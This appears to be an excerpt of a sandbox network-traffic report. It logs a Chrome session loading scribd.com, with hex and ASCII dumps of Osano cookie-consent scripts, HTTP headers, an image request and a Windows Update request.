                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:21 UTC16384INData Raw: 72 2e 6f 6e 63 65 7c 7c 65 2e 70 61 73 73 69 76 65 21 3d 3d 72 2e 70 61 73 73 69 76 65 2c 6e 3d 65 21 3d 3d 41 26 26 28 72 3d 3d 3d 41 7c 7c 6f 29 3b 6f 26 26 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 68 69 73 2e 6e 61 6d 65 2c 74 68 69 73 2c 72 29 2c 6e 26 26 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 68 69 73 2e 6e 61 6d 65 2c 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 5f 24 41 48 3d 65 7d 7d 68 61 6e 64 6c 65 45 76 65 6e 74 28 65 29 7b 76 61 72 20 74 2c 72 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 68 69 73 2e 5f 24 41 48 3f 74 68 69 73 2e 5f 24 41 48 2e 63 61 6c 6c 28 6e 75 6c 6c 21 3d 3d 28 72 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: r.once||e.passive!==r.passive,n=e!==A&&(r===A||o);o&&this.element.removeEventListener(this.name,this,r),n&&this.element.addEventListener(this.name,this,e),this._$AH=e}}handleEvent(e){var t,r;"function"==typeof this._$AH?this._$AH.call(null!==(r=null===(t=
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:21 UTC16384INData Raw: 6e 20 65 3d 3e 7b 76 61 72 20 6f 3d 65 2e 74 61 72 67 65 74 2e 63 68 65 63 6b 65 64 3b 72 2e 64 69 73 70 61 74 63 68 28 4f 65 2e 5a 50 2e 73 65 74 43 6f 6e 73 65 6e 74 28 74 2c 6f 3f 69 2e 65 4a 3a 69 2e 44 76 29 29 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 49 74 28 65 29 7b 76 61 72 7b 63 61 74 65 67 6f 72 79 3a 74 2c 70 72 65 66 69 78 3a 72 2c 73 74 6f 72 65 3a 7b 67 65 74 53 74 61 74 65 3a 6f 7d 7d 3d 65 2c 6e 3d 6f 28 29 2c 61 3d 28 30 2c 57 2e 51 63 29 28 6e 29 2c 63 3d 28 30 2c 57 2e 6d 72 29 28 6e 2c 74 29 2c 73 3d 28 30 2c 57 2e 4c 50 29 28 6e 2c 74 29 2c 6c 3d 61 26 26 22 22 2e 63 6f 6e 63 61 74 28 72 2c 22 64 72 61 77 65 72 2d 74 6f 67 67 6c 65 2d 2d 63 61 74 65 67 6f 72 79 5f 22 29 2e 63 6f 6e 63 61 74 28 74 2c 22 2d 2d 64 65 73 63 72 69 70 74 69 6f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: n e=>{var o=e.target.checked;r.dispatch(Oe.ZP.setConsent(t,o?i.eJ:i.Dv))}};function It(e){var{category:t,prefix:r,store:{getState:o}}=e,n=o(),a=(0,W.Qc)(n),c=(0,W.mr)(n,t),s=(0,W.LP)(n,t),l=a&&"".concat(r,"drawer-toggle--category_").concat(t,"--descriptio
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:21 UTC16384INData Raw: 6c 65 6d 65 6e 74 3a 22 6d 65 73 73 61 67 65 22 2c 6d 6f 64 69 66 69 65 72 73 3a 7b 65 6c 65 6d 65 6e 74 3a 7b 64 69 73 61 62 6c 65 64 3a 6e 7d 7d 7d 29 7d 2c 66 3d 7b 61 6e 61 6c 79 74 69 63 73 3a 69 2e 67 6f 2e 74 72 61 6e 73 6c 61 74 65 28 22 63 61 74 65 67 6f 72 69 65 73 2e 41 4e 41 4c 59 54 49 43 53 2e 6c 61 62 65 6c 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 3a 69 2e 67 6f 2e 74 72 61 6e 73 6c 61 74 65 28 22 63 61 74 65 67 6f 72 69 65 73 2e 50 45 52 53 4f 4e 41 4c 49 5a 41 54 49 4f 4e 2e 6c 61 62 65 6c 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6d 61 72 6b 65 74 69 6e 67 3a 69 2e 67 6f 2e 74 72 61 6e 73 6c 61 74 65 28 22 63 61 74 65 67 6f 72 69 65 73 2e 4d 41 52 4b 45 54 49 4e 47 2e 6c 61
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: lement:"message",modifiers:{element:{disabled:n}}})},f={analytics:i.go.translate("categories.ANALYTICS.label").toLowerCase(),personalization:i.go.translate("categories.PERSONALIZATION.label").toLowerCase(),marketing:i.go.translate("categories.MARKETING.la
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:21 UTC16384INData Raw: 6f 6e 28 65 2c 74 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 65 29 7b 76 61 72 20 72 3d 64 6f 63 75 6d 65 6e 74 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 2c 6f 3d 41 72 72 61 79 2e 66 72 6f 6d 28 51 6e 28 65 29 29 2e 66 69 6c 74 65 72 28 7a 6e 29 5b 30 5d 3b 74 72 79 7b 6f 2e 66 6f 63 75 73 28 4a 6e 29 7d 63 61 74 63 68 28 6c 29 7b 74 26 26 74 2e 66 6f 63 75 73 28 4a 6e 29 7d 72 65 74 75 72 6e 20 72 7d 7d 2c 58 6e 3d 7b 66 69 72 73 74 3a 22 6c 61 73 74 22 2c 6c 61 73 74 3a 22 66 69 72 73 74 22 7d 2c 65 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 22 22 3b 72 65 74 75 72 6e 20 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: on(e,t){if(null!==e){var r=document.activeElement,o=Array.from(Qn(e)).filter(zn)[0];try{o.focus(Jn)}catch(l){t&&t.focus(Jn)}return r}},Xn={first:"last",last:"first"},ea=function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:"";return func
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:21 UTC16384INData Raw: 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 64 6f 63 75 6d 65 6e 74 2c 22 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 22 2c 5a 69 28 5a 69 28 7b 7d 2c 43 69 2e 49 50 29 2c 7b 7d 2c 7b 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 74 3d 6e 65 77 20 41 72 72 61 79 28 65 29 2c 72 3d 30 3b 72 3c 65 3b 72 2b 2b 29 74 5b 72 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3b 76 61 72 20 6f 3d 43 69 2e 49 50 2e 76 61 6c 75 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 74 29 3b 72 65 74 75 72 6e 20 6f 2e 74 61 67 4e 61 6d 65 2c 6f 7d 7d 29 29 3b 76 61 72 20 4d 69 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 63 6c 61 73 73 20 46 69 7b 67 65 74 20 6d 69 64 64 6c 65 77 61 72 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: );Object.defineProperty(document,"createElement",Zi(Zi({},Ci.IP),{},{value:function(){for(var e=arguments.length,t=new Array(e),r=0;r<e;r++)t[r]=arguments[r];var o=Ci.IP.value.apply(this,t);return o.tagName,o}}));var Mi=new WeakMap;class Fi{get middleware
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC13232INData Raw: 77 69 64 67 65 74 2d 2d 70 6f 73 69 74 69 6f 6e 5f 6c 65 66 74 7b 6c 65 66 74 3a 31 32 70 78 7d 2e 6f 73 61 6e 6f 2d 63 6d 2d 77 69 64 67 65 74 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 73 6f 6c 69 64 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 2e 32 72 65 6d 7d 2e 6f 73 61 6e 6f 2d 63 6d 2d 77 69 64 67 65 74 3a 66 6f 63 75 73 2c 2e 6f 73 61 6e 6f 2d 63 6d 2d 77 69 64 67 65 74 3a 68 6f 76 65 72 7b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 2e 31 29 7d 2e 6f 73 61 6e 6f 2d 63 6d 2d 77 69 64 67 65 74 2d 2d 68 69 64 64 65 6e 7b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 6d 73 2c 30 6d 73 2c 2e 34 73 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 6f 73 61 6e 6f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: widget--position_left{left:12px}.osano-cm-widget:focus{outline:solid;outline-offset:.2rem}.osano-cm-widget:focus,.osano-cm-widget:hover{opacity:1;transform:scale(1.1)}.osano-cm-widget--hidden{opacity:0;transition-delay:0ms,0ms,.4s;visibility:hidden}.osano
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC16384INData Raw: 65 2c 22 63 6f 6e 66 69 67 2e 67 64 70 72 41 70 70 6c 69 65 73 22 2c 21 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 2c 6c 3d 28 65 2c 74 29 3d 3e 28 30 2c 61 2e 55 32 29 28 65 2c 22 63 6f 6e 66 69 67 2e 6a 75 72 69 73 64 69 63 74 69 6f 6e 22 2c 22 22 29 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 74 2e 6c 65 6e 67 74 68 29 3d 3d 3d 74 2c 70 3d 28 65 2c 74 29 3d 3e 28 30 2c 61 2e 55 32 29 28 65 2c 22 69 61 62 2e 63 6f 6e 73 65 6e 74 53 74 72 69 6e 67 73 2e 22 2e 63 6f 6e 63 61 74 28 74 29 2c 76 6f 69 64 20 30 29 2c 64 3d 65 3d 3e 21 69 28 65 29 26 26 21 21 28 30 2c 61 2e 55 32 29 28 65 2c 22 73 61 76 65 64 43 6f 6e 73 65 6e 74 22 2c 21 31 29 7d 2c 33 39 34 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 49 32 3a 28 29 3d 3e 69 2c 52 34 3a 28 29 3d 3e 64 2c 54
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: e,"config.gdprApplies",!1).toString(),l=(e,t)=>(0,a.U2)(e,"config.jurisdiction","").substring(0,t.length)===t,p=(e,t)=>(0,a.U2)(e,"iab.consentStrings.".concat(t),void 0),d=e=>!i(e)&&!!(0,a.U2)(e,"savedConsent",!1)},394:(e,t,r)=>{r.d(t,{I2:()=>i,R4:()=>d,T
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC16384INData Raw: 65 3a 74 2c 69 67 6e 6f 72 65 3a 72 2c 73 68 6f 75 6c 64 52 65 6d 6f 76 65 4f 6e 42 6c 6f 63 6b 3a 6f 7d 3d 65 3b 69 66 28 72 29 72 65 74 75 72 6e 20 44 28 65 29 3b 74 26 26 28 28 30 2c 61 2e 53 64 29 28 74 2c 6b 29 2c 70 2e 71 2e 76 61 6c 75 65 2e 63 61 6c 6c 28 74 2c 22 62 65 66 6f 72 65 73 63 72 69 70 74 65 78 65 63 75 74 65 22 2c 45 29 2c 6f 26 26 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 26 26 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 29 7d 2c 41 3d 65 3d 3e 65 26 26 4f 62 6a 65 63 74 2e 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 2e 63 61 6c 6c 28 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2c 65 29 2c 4e 3d 65 3d 3e 41 28 65 29 26 26 73 28 62 2e 71 49 2e 76 61 6c 75
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: e:t,ignore:r,shouldRemoveOnBlock:o}=e;if(r)return D(e);t&&((0,a.Sd)(t,k),p.q.value.call(t,"beforescriptexecute",E),o&&t.parentElement&&t.parentElement.removeChild(t))},A=e=>e&&Object.isPrototypeOf.call(HTMLScriptElement.prototype,e),N=e=>A(e)&&s(b.qI.valu


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        17192.168.2.164973118.165.220.244436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:20 UTC674OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: cmp.osano.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:21 UTC865INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 4650
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 10:21:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 19 Aug 2024 22:15:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "a0cbc82c3c7bce3b368e2118b3cb29d3"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-version-id: IV.sz0dqhMjQD06H4vRdCjcmpoMDLZ8n
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 f0e28236e1c4da7e6a02d601c5d0ceca.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: iYaD8O5fnDsbYx6T_0UVxvu8_Mbn-JagrGe0xyOEWlfuGVoNvOu3Pw==
                                                                                                                                                                                                                                                                                                                                                                                        Age: 41863
                                                                                                                                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:21 UTC3198INData Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 77 69 6e 64 6f 77 20 21 3d 3d 20 77 69 6e 64 6f 77 2e 74 6f 70 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 47 45 54 5f 53 54 4f 52 41 47 45 20 3d 20 27 47 45 54 5f 53 54 4f 52 41 47 45 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 43 4c 45 41 52 5f 53 54 4f 52 41 47 45 20 3d 20 27 43 4c 45 41 52 5f 53 54 4f 52 41 47 45 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 52 45 43 45 49 56 45 5f 53 54 4f 52 41 47 45 20 3d 20 27 52 45 43 45 49 56 45 5f 53 54 4f 52 41 47 45 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html> <head> <script> if (window !== window.top) { var GET_STORAGE = 'GET_STORAGE'; var CLEAR_STORAGE = 'CLEAR_STORAGE'; var RECEIVE_STORAGE = 'RECEIVE_STORAGE'; var
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:21 UTC1452INData Raw: 20 20 20 20 20 20 20 20 63 61 73 65 20 55 50 44 41 54 45 5f 53 54 4f 52 41 47 45 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 6f 72 65 4b 65 79 20 2b 20 27 5f 27 20 2b 20 63 6f 6e 66 69 67 49 64 20 2b 20 28 6b 65 79 20 3d 3d 3d 20 27 5f 27 20 3f 20 27 27 20 3a 20 27 5f 27 20 2b 20 6b 65 79 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: case UPDATE_STORAGE: localStorage.setItem( storeKey + '_' + configId + (key === '_' ? '' : '_' + key), value


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        18192.168.2.164973220.109.210.53443
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=NsFdCpOb8MEGFPx&MD=+MfZCRKU HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                                                                                                                        MS-CorrelationId: 909338a4-b9ae-4d39-bb25-01813b898e42
                                                                                                                                                                                                                                                                                                                                                                                        MS-RequestId: 3c73c4c1-e0dc-4cd1-9013-6cdcf6353af8
                                                                                                                                                                                                                                                                                                                                                                                        MS-CV: beIcGmnZD0GnwY7W.0
                                                                                                                                                                                                                                                                                                                                                                                        X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 24490
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        19192.168.2.1649733151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC636OUTGET /webpack/assets/images/shared/gr_table_reading.9f6101a1.png HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:22 UTC556INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 29999
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 29 Aug 2024 21:16:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "d1e083f52aaed174a437ae88ebff5785"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Age: 2727952
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740053-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 1818
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522363.524837,VS0,VE0
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
